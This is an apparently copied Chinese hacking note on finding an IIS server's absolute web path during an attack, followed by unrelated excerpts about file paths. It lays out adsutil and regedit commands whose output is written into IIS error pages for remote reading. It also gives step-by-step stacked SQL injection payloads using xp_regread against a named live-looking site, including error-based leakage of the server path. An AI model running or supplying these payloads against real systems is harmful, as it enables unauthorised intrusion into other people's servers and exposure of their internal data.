檢視WEB絕對路徑目錄命令

2021-04-07 04:46:19 字數 2718 閱讀 8927

檢視web絕對路徑目錄命令

檢視web**安裝目錄命令:

   cscript c:/inetpub/adminscripts/adsutil.vbs enum w3svc/2/root >c:/test1.txt (將2換成1、3、4、5試試)

type c:/test1.txt

del c:/test1.txt

在nbsi下可以直接顯示執行結果,所以不用匯出到檔案

2)在**上隨便找到乙個的名字 123.jpg

然後寫進批處理程式123.bat:

執行後 type c:/123.txt

這樣來分析**的路徑

3)sql伺服器和**伺服器在同乙個伺服器上,好了是可以執行命令是吧?

將執行命令輸出結果到

%windir%/help/iishelp/common/404b.htm或者500.asp

注意輸出前backup這兩個檔案

如: dir c:/ >%windir%/help/iishelp/common/404b.htm

然後隨便輸入乙個檔案來訪問:http://目標ip/2.asp   

4)針對win2000系統:

xp_regread讀取hkey_local_machine/system/controlset001/services/w3svc/parameters/virtual roots 獲取web路徑

2003系統:未找到利用方法

如: (1)   新建乙個表cyfd(欄位為gyfd):http://www.cnwill.com/newsshow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--

(2)   把web路徑寫進去:http://www.cnwill.com/newsshow.aspx?id=4844;declare @result varchar(255) exec master.dbo.xp_regread 』hkey_local_machine』,』system/controlset001/services/w3svc/parameters/virtual roots』, 』/』 ,@result output insert into cyfd (gyfd) values(@result);--   

(3)   還是讓他不匹配,顯示錯誤:http://www.cnwill.com/newsshow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)   

source: .net sqlclient data provider

description: 將 varchar 值 』y:/web/煙台人才**後台管理系統,,201 』 轉換為資料型別為 int 的列時發生語法錯誤。

targesite: boolean read() 哈哈哈。。路徑暴露了。。

(4)接下來刪除表:http://www.cnwill.com/newsshow.aspx?id=4844;drop table cyfd;--

5)用regedit命令匯出登錄檔,將匯出的結果儲存的路徑到%windir%/help/iishelp/common/404b.htm或者500.asp頁面

regedit命令說明:

regedit /l:system /r:user /e filename.reg regpath

引數含義:

/l:system指定system.dat檔案所在的路徑。

/r:user指定user.dat檔案所在的路徑。

/e:此引數指定登錄檔編輯器要進行匯出登錄檔操作,在此引數後面空一格,輸入匯出登錄檔的檔名。

regpath:用來指定要匯出哪個登錄檔的分支,如果不指定,則將匯出全部登錄檔分支。在這些引數中,"/l:system"和"/r:user"引數是可選項,如果不使用這兩個引數,登錄檔編輯器則認為是對windows目錄下的"system.dat"和"user.dat"檔案進行操作。如果是通過從軟盤啟動並進入dos,那麼就必須使用"/l"和"/r"引數來指定"system.dat"和"user.dat"檔案的具體路徑,否則登錄檔編輯器將無法找到它們。比如說,如果通過啟動盤進入dos,則備份登錄檔的命令是"regedit /l:c:/windows//r:c:/windows//e regedit.reg",該命令的意思是把整個登錄檔備份到windows目錄下,其檔名為"regedit.reg"。而如果輸入的是"regedit /e d:/regedit.reg"這條命令,則是說把整個登錄檔備份到d盤的根目錄下(省略了"/l"和"/r"引數),其檔名為"regedit.reg"。

regedit /s c:/adam.reg 匯入c:/adam.reg檔案至登錄檔

regedit /e c:/web.reg 備份全部註冊內容到c:/web.reg中

針對win2000系統:c:/>regedit /e %windir%/help/iishelp/common/404b.htm "hkey_local_machine/system/controlset001/services/w3svc/parameters/virtual roots"

然後http://目標ip/2.asp

針對win2003系統:沒有找到,希望找到的朋友公布出來一起討論

快速找WEB絕對路徑目錄命令

cscript c inetpub adminscripts adsutil.vbs enum w3svc 2 root c test1.txt 將2換成1 3 4 5試試 type c test1.txt del c test1.txt 在nbsi下可以直接顯示執行結果,所以不用匯出到檔案 2 在...

檢視檔案絕對 路徑 認識「路徑」

在我們的日常實際工作中,經常會需要在網頁中插入影象等外部檔案,此時就需要採用 路徑 的方式來指定檔案的位置。路徑可以分為 絕對路徑和相對路徑。絕對路徑 絕對路徑是包括伺服器規範在內的完全路徑。絕對路徑不管原始檔在什麼位置都可以非常精確的找到,除非是目標文件的位置發生變化,否則連線不會失敗。優點 缺點...

相對 絕對路徑 rm mkdir 命令

絕對路徑是檔案的真正存在的路徑,是指從硬碟的根目錄開始,進行一級級目錄指向檔案。例如 root eweb ls usr local nginx 1.8.0.tar.gz usr local nginx 1.8.0.tar.gz 相對路徑就是以當前路徑為基準進行一級級目錄指向被引用的資源檔案。root...